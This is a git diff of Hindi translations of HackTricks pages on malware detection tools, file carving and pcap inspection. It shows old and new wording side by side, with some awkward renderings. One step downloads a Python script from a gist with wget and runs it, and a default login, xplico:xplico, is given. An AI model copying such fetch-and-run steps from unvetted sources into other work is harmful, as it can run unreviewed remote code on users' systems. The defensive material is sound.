इस स्क्रिप्ट का उपयोग करके गिथब से सभी यारा मैलवेयर नियम डाउनलोड और मर्ज करें: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नाम की फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे।
|
||||
_**rules**_ निर्देशिका बनाएं और इसे निष्पादित करें। इससे _**malware\_rules.yar**_ नामक एक फ़ाइल बनेगी जिसमें सभी मैलवेयर के लिए यारा नियम होंगे।
|
||||
```bash
|
||||
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
|
||||
mkdir rules
|
||||
|
@ -48,9 +49,9 @@ python malware_yara_rules.py
|
|||
yara -w malware_rules.yar image #Scan 1 file
|
||||
yara -w malware_rules.yar folder #Scan the whole folder
|
||||
```
|
||||
#### YaraGen: मैलवेयर की जांच करें और नियम बनाएं
|
||||
#### YaraGen: मैलवेयर की जाँच करें और नियम बनाएं
|
||||
|
||||
आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग करके एक बाइनरी से यारा नियम उत्पन्न कर सकते हैं। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
आप टूल [**YaraGen**](https://github.com/Neo23x0/yarGen) का उपयोग कर सकते हैं ताकि आप एक बाइनरी से यारा नियम उत्पन्न कर सकें। इन ट्यूटोरियल्स की जाँच करें: [**भाग 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**भाग 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**भाग 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
```bash
|
||||
python3 yarGen.py --update
|
||||
python3.exe yarGen.py --excludegood -m ../../mals/
|
||||
|
@ -67,11 +68,11 @@ sudo freshclam #Update rules
|
|||
clamscan filepath #Scan 1 file
|
||||
clamscan folderpath #Scan the whole folder
|
||||
```
|
||||
### [कैपा](https://github.com/mandiant/capa)
|
||||
### [Capa](https://github.com/mandiant/capa)
|
||||
|
||||
**कैपा** executables में पोटेंशियली हानिकारक **क्षमताएँ** का पता लगाता है: PE, ELF, .NET। इसलिए यह चीजों को खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे:
|
||||
**Capa** प्रोग्रामों में पोटेंशियली जानलेवा **क्षमताएँ** पहचानता है: PE, ELF, .NET। इसलिए यह चीजें खोजेगा जैसे Att\&ck तकनीकें, या संदिग्ध क्षमताएँ जैसे:
|
||||
|
||||
* OutputDebugString त्रुटि की जांच करें
|
||||
* OutputDebugString त्रुटि की जाँच करें
|
||||
* सेवा के रूप में चलाएं
|
||||
* प्रक्रिया बनाएं
|
||||
|
||||
|
@ -79,15 +80,15 @@ clamscan folderpath #Scan the whole folder
|
|||
|
||||
### IOCs
|
||||
|
||||
IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्ट **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क** में इस प्रकार के हानिकारक फ़ाइलों की **खोज के लिए** करती है।\
|
||||
IOC का मतलब होता है Indicator Of Compromise। एक IOC एक सेट की **शर्तें हैं जो** कुछ पोटेंशियली अवांछित सॉफ्टवेयर या पुष्टि की गई **मैलवेयर** की पहचान करती हैं। ब्लू टीम इस प्रकार की परिभाषा का उपयोग अपने **सिस्टम** और **नेटवर्क्स** में इस प्रकार के जानलेवा फ़ाइलों की **खोज के लिए** करती है।\
|
||||
इन परिभाषाओं को साझा करना बहुत उपयोगी है क्योंकि जब किसी कंप्यूटर में मैलवेयर की पहचान होती है और उस मैलवेयर के लिए एक IOC बनाया जाता है, तो अन्य ब्लू टीम इसका उपयोग करके मैलवेयर की पहचान तेजी से कर सकती है।
|
||||
|
||||
IOC बनाने या संशोधित करने के लिए एक उपकरण है [**IOC संपादक**](https://www.fireeye.com/services/freeware/ioc-editor.html)**।**\
|
||||
आप उपकरणों का उपयोग कर सकते हैं जैसे [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **डिवाइस में परिभाषित IOC की खोज करने के लिए**।
|
||||
आप [**Redline**](https://www.fireeye.com/services/freeware/redline.html) जैसे उपकरण का उपयोग कर सकते हैं **एक उपकरण में परिभाषित IOC की खोज के लिए**।
|
||||
|
||||
### लोकी
|
||||
### Loki
|
||||
|
||||
[**लोकी**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान इंडिकेटर्स ऑफ कंप्रोमाइज के लिए।\
|
||||
[**Loki**](https://github.com/Neo23x0/Loki) एक स्कैनर है आसान जानलेवा संकेतों के लिए।\
|
||||
पहचान चार पहचान पद्धतियों पर आधारित है:
|
||||
```
|
||||
1. File Name IOC
|
||||
|
@ -104,11 +105,11 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
|
|||
```
|
||||
### लिनक्स मैलवेयर डिटेक्ट
|
||||
|
||||
[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो गनू जीवीपीएल लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क किनारे घुसपैठ डिटेक्शन सिस्टम से धमाकों में उपयोग किया जा रहा मैलवेयर निकालने के लिए धमाकों से निकाला गया मैलवेयर का डेटा उपयोग करता है और पहचान के लिए सिग्नेचर उत्पन्न करता है। साथ ही, धमाकों से डेटा भी LMD चेकआउट सुविधा और मैलवेयर समुदाय संसाधनों से प्राप्त किया जाता है।
|
||||
[**लिनक्स मैलवेयर डिटेक्ट (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) एक मैलवेयर स्कैनर है जो लिनक्स के लिए GNU GPLv2 लाइसेंस के तहत जारी किया गया है, जो साझा होस्टेड वातावरणों में प्रतिकूलताओं के आसपास डिज़ाइन किया गया है। यह नेटवर्क एज इन्ट्रूजन डिटेक्शन सिस्टम से धारा डेटा का उपयोग करता है ताकि हमलों में सक्रिय रूप से उपयोग किया जा रहा मैलवेयर निकाल सके और पहचान के लिए सिग्नेचर उत्पन्न कर सके। साथ ही, धारा डेटा भी उपयोगकर्ता सबमिशन से लिया जाता है जिसमें LMD चेकआउट फीचर और मैलवेयर समुदाय संसाधन शामिल हैं।
|
||||
|
||||
### आरकेहंटर
|
||||
### rkhunter
|
||||
|
||||
[**रेखंटर**](http://rkhunter.sourceforge.net) जैसे उपकरण फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जहाँ संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है।
|
||||
[**rkhunter**](http://rkhunter.sourceforge.net) जैसे उपकरण को फाइल सिस्टम की जाँच के लिए उपयोग किया जा सकता है जिसमें संभावित **रूटकिट्स** और मैलवेयर की जाँच की जा सकती है।
|
||||
```bash
|
||||
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
|
||||
```
|
||||
|
@ -118,27 +119,27 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
|
|||
|
||||
### PEpper
|
||||
|
||||
[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक विषयों की जांच करता है (बाइनरी डेटा, एंट्रोपी, URLs और IPs, कुछ yara नियम।)
|
||||
[PEpper ](https://github.com/Th3Hurrican3/PEpper) executable में कुछ मौलिक चीजें जैसे binary data, entropy, URLs और IPs, कुछ yara rules की जांच करता है।
|
||||
|
||||
### PEstudio
|
||||
|
||||
[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और पोटेंशियल Att\&ck तकनीकों को भी खोजेगा।
|
||||
[PEstudio](https://www.winitor.com/download) एक टूल है जो Windows executables की जानकारी प्राप्त करने की अनुमति देता है जैसे imports, exports, headers, लेकिन यह वायरस टोटल की जांच करेगा और potential Att\&ck techniques खोजेगा।
|
||||
|
||||
### Detect It Easy(DiE)
|
||||
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **एन्क्रिप्टेड** है या नहीं यह खोजने के लिए है और **पैकर्स** को भी खोजेगा।
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) एक टूल है जो फ़ाइल को **encrypted** है या नहीं यह खोजने के लिए है और **packers** भी खोजेगा।
|
||||
|
||||
### NeoPI
|
||||
|
||||
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python स्क्रिप्ट है जो **सांख्यिकीय विधियों** का उपयोग करके **छिपे हुए** और **एन्क्रिप्टेड** सामग्री की खोज करने के लिए है। NeoPI का उद्देश्य **छिपी वेब शैल कोड** की **खोज** में सहायता करना है।
|
||||
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI) एक Python script है जो **statistical methods** का उपयोग करके **obfuscated** और **encrypted** content को text/script files में खोजने के लिए है। NeoPI का उद्देश्य **hidden web shell code** की **detection** में सहायता करना है।
|
||||
|
||||
### **php-malware-finder**
|
||||
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **छिपे हुए**/**अविश्वसनीय कोड** को खोजें जैसे कि फ़ाइलें जो **मैलवेयर**/वेबशैल में अक्सर उपयोग की जाने वाली **PHP** फ़ंक्शन्स का उपयोग कर रही हों।
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **obfuscated**/**dodgy code** और फ़ाइलें खोजें जो **malwares**/webshells में अक्सर उपयोग की जाने वाली **PHP** functions का उपयोग करती हैं।
|
||||
|
||||
### Apple Binary Signatures
|
||||
|
||||
किसी **मैलवेयर नमूने** की जांच करते समय आपको हमेशा बाइनरी के **सिग्नेचर** की जांच करनी चाहिए क्योंकि उस **डेवलपर** को जिसने इसे साइन किया हो, पहले से ही **मैलवेयर** से **संबंधित** हो सकता है।
|
||||
किसी **malware sample** की जांच करते समय आपको हमेशा बाइनरी के **signature** की जांच करनी चाहिए क्योंकि उस **developer** को जिसने इसे **sign** किया हो संबंधित हो सकता है **malware** के साथ।
|
||||
```bash
|
||||
#Get signer
|
||||
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
|
||||
|
@ -149,16 +150,16 @@ codesign --verify --verbose /Applications/Safari.app
|
|||
#Check if the signature is valid
|
||||
spctl --assess --verbose /Applications/Safari.app
|
||||
```
|
||||
## पहचान तकनीकें
|
||||
## डिटेक्शन तकनीक
|
||||
|
||||
### फ़ाइल स्टैकिंग
|
||||
|
||||
अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई निश्चित तारीख** को **अपडेट किया गया था**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें।
|
||||
अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की किसी तारीख को **अंतिम बार अपडेट हुई थी**। **जांचें** कि **वेब सर्वर में सभी फ़ाइलें कब बनाई और संशोधित की गई थीं** और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें।
|
||||
|
||||
### बेसलाइन्स
|
||||
|
||||
अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** वालों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा।
|
||||
अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** फ़ाइलों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा।
|
||||
|
||||
### सांख्यिकीय विश्लेषण
|
||||
|
||||
जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक** शामिल हो सकता है।
|
||||
जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में सबसे अधिक हो सकता है**।
|
||||
|
|
|
@ -1,29 +1,28 @@
|
|||
{% hint style="success" %}
|
||||
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# खुदाई उपकरण
|
||||
# कार्विंग टूल्स
|
||||
|
||||
## Autopsy
|
||||
|
||||
जांच में सबसे आम उपकरण जो छवियों से फ़ाइलें निकालने के लिए उपयोग किया जाता है [**Autopsy**](https://www.autopsy.com/download/) है। इसे डाउनलोड करें, स्थापित करें और फ़ाइल को इंजेस्ट करने के लिए इसे बनाएं "छिपी" फ़ाइलें खोजने के लिए। ध्यान दें कि Autopsy को डिस्क छवियों और अन्य प्रकार की छवियों का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का नहीं।
|
||||
फोरेंसिक्स में सबसे आम उपयोग किया जाने वाला टूल [**Autopsy**](https://www.autopsy.com/download/) है। इसे डाउनलोड करें, इंस्टॉल करें और फ़ाइल को इंजेस्ट करने के लिए इसका उपयोग करें ताकि "छिपी" फ़ाइलें मिल सकें। ध्यान दें कि Autopsy को डिस्क इमेज और अन्य प्रकार की इमेज का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का समर्थन नहीं किया गया है।
|
||||
|
||||
## Binwalk <a id="binwalk"></a>
|
||||
|
||||
**Binwalk** एक उपकरण है जो छवियों और ऑडियो फ़ाइलों जैसी बाइनरी फ़ाइलों को खोजने के लिए है जिसमें एम्बेडेड फ़ाइलें और डेटा होता है।
|
||||
इसे `apt` के साथ स्थापित किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर मिल सकता है।
|
||||
**उपयोगी कमांड**:
|
||||
**Binwalk** एक टूल है जो इमेज और ऑडियो फ़ाइलों जैसे बाइनरी फ़ाइलों में छिपी फ़ाइलें और डेटा की खोज के लिए उपयोग किया जाता है। इसे `apt` के साथ इंस्टॉल किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर उपलब्ध है। **उपयोगी कमांड**:
|
||||
```bash
|
||||
sudo apt install binwalk #Insllation
|
||||
binwalk file #Displays the embedded data in the given file
|
||||
|
@ -32,15 +31,15 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
|
|||
```
|
||||
## Foremost
|
||||
|
||||
छिपे फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलें खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यासित फ़ाइल प्रकारों के लिए खोज करेगा।
|
||||
छिपी हुई फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलें खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यस्त फ़ाइल प्रकारों के लिए खोज करेगा।
|
||||
```bash
|
||||
sudo apt-get install foremost
|
||||
foremost -v -i file.img -o output
|
||||
#Discovered files will appear inside the folder "output"
|
||||
```
|
||||
## **Scalpel**
|
||||
## **स्कैल्पल**
|
||||
|
||||
**Scalpel** एक और उपकरण है जिसका उपयोग **एक फ़ाइल में एम्बेड किए गए फ़ाइलें खोजने और निकालने** के लिए किया जा सकता है। इस मामले में, आपको उसे निकालने के लिए फ़ाइल प्रकारों को कॉन्फ़िगरेशन फ़ाइल \(_/etc/scalpel/scalpel.conf_\) से uncomment करने की आवश्यकता होगी।
|
||||
**स्कैल्पल** एक और उपकरण है जिसका उपयोग **एक फ़ाइल में एम्बेड किए गए फ़ाइलें खोजने और निकालने** के लिए किया जा सकता है। इस मामले में, आपको उसे निकालना चाहिए जिसे आप विन्यास फ़ाइल \(_/etc/scalpel/scalpel.conf_\) से अनटिक करना चाहेंगे।
|
||||
```bash
|
||||
sudo apt-get install scalpel
|
||||
scalpel file.img -o output
|
||||
|
@ -53,13 +52,13 @@ scalpel file.img -o output
|
|||
```text
|
||||
bulk_extractor memory.img -o out_folder
|
||||
```
|
||||
Navigate through **सभी जानकारी** जो उपकरण ने इकट्ठा की है \(पासवर्ड?\), **डाटा पैकेट** का **विश्लेषण** करें \(पढ़ें [**Pcaps विश्लेषण**](../pcap-inspection/)\), **अजीब डोमेन** की खोज करें \(मैलवेयर से संबंधित या **अस्तित्व में न होने वाले** डोमेन\).
|
||||
Navigate through **सभी जानकारी** जो उपकरण ने इकट्ठा की है \(पासवर्ड?\), **विश्लेषित** करें **पैकेट्स** \(पढ़ें [**Pcaps विश्लेषण**](../pcap-inspection/)\), **अजीब डोमेन** खोजें \(मैलवेयर से संबंधित या **अस्तित्वहीन**\).
|
||||
|
||||
## PhotoRec
|
||||
|
||||
आप इसे [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) में पा सकते हैं।
|
||||
|
||||
यह GUI और CLI संस्करण के साथ आता है। आप फाइल-प्रकार चुन सकते हैं जिनकी खोज के लिए PhotoRec को।
|
||||
यह GUI और CLI संस्करण के साथ आता है। आप चुन सकते हैं **फ़ाइल-प्रकार** जिनकी खोज के लिए PhotoRec को खोजना है।
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28524%29.png)
|
||||
|
||||
|
@ -67,10 +66,11 @@ Navigate through **सभी जानकारी** जो उपकरण न
|
|||
|
||||
## FindAES
|
||||
|
||||
अपने की स्थिति खोजने के लिए AES कुंजियों की खोज करता है उनकी कुंजी अनुसूचियों की खोज करके। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे कि TrueCrypt और BitLocker द्वारा उपयोग की गई कुंजियाँ।
|
||||
अपने कुंजी अनुसूचियों की खोज करके AES कुंजियों की खोज करता है। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे जो TrueCrypt और BitLocker द्वारा उपयोग की जाती हैं।
|
||||
|
||||
यहाँ से डाउनलोड करें [here](https://sourceforge.net/projects/findaes/).
|
||||
यहाँ [डाउनलोड करें](https://sourceforge.net/projects/findaes/).
|
||||
|
||||
# पूरक उपकरण
|
||||
|
||||
आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं छवियों को देखने के लिए टर्मिनल से। आप लिनक्स कमांड लाइन उपकरण **pdftotext** का उपयोग कर सकते हैं एक पीडीएफ को पाठ में बदलने और पढ़ने के लिए।
|
||||
आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं ताकि आप छवियों को टर्मिनल से देख सकें।
|
||||
आप लिनक्स कमांड लाइन उपकरण **pdftotext** का उपयोग करके एक पीडीएफ को पाठ में रूपांतरित करने और पढ़ने के लिए कर सकते हैं।
|
||||
|
|
|
@ -1,33 +1,34 @@
|
|||
# Pcap Inspection
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट** करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
|
||||
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
{% hint style="info" %}
|
||||
**PCAP** बनाम **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को Wireshark या किसी अन्य संगत उपकरण का उपयोग करके PCAP से PCAPNG में परिवर्तित करने की आवश्यकता हो सकती है।
|
||||
**PCAP** vs **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को PCAP से PCAPNG में रूपांतरित करने की आवश्यकता हो सकती है, Wireshark या किसी अन्य संगत उपकरण का उपयोग करके।
|
||||
{% endhint %}
|
||||
|
||||
## Pcap के लिए ऑनलाइन उपकरण
|
||||
|
||||
* यदि आपके pcap का हेडर **टूटा हुआ** है तो आपको इसे ठीक करने के लिए यह आजमाना चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
|
||||
* [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** और **मैलवेयर** खोजें
|
||||
* यदि आपके pcap का हेडर **टूटा** हुआ है तो आपको इसे ठीक करने की कोशिश करनी चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
|
||||
* [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** निकालें और **मैलवेयर** खोजें
|
||||
* [**www.virustotal.com**](https://www.virustotal.com) और [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) का उपयोग करके **दुष्ट गतिविधि** खोजें
|
||||
|
||||
## जानकारी निकालें
|
||||
|
@ -37,7 +38,7 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
### Wireshark
|
||||
|
||||
{% hint style="info" %}
|
||||
**यदि आप एक PCAP का विश्लेषण करने जा रहे हैं तो आपको मूल रूप से Wireshark का उपयोग कैसे करना है यह जानना चाहिए**
|
||||
**यदि आप PCAP का विश्लेषण करने जा रहे हैं तो आपको बुनियादी रूप से Wireshark का उपयोग कैसे करना है, इसे जानना चाहिए**
|
||||
{% endhint %}
|
||||
|
||||
आप Wireshark में कुछ ट्रिक्स यहाँ पा सकते हैं:
|
||||
|
@ -62,27 +63,27 @@ sudo apt-get install xplico
|
|||
/etc/init.d/apache2 restart
|
||||
/etc/init.d/xplico start
|
||||
```
|
||||
पहुँच _**127.0.0.1:9876**_ के साथ पहुँचने के लिए पहुँचकर्ता _**xplico:xplico**_
|
||||
_**127.0.0.1:9876**_ क्रेडेंशियल के साथ पहुंचें _**xplico:xplico**_
|
||||
|
||||
फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap** फ़ाइल **अपलोड** करें।
|
||||
फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap फ़ाइल अपलोड** करें।
|
||||
|
||||
### NetworkMiner
|
||||
|
||||
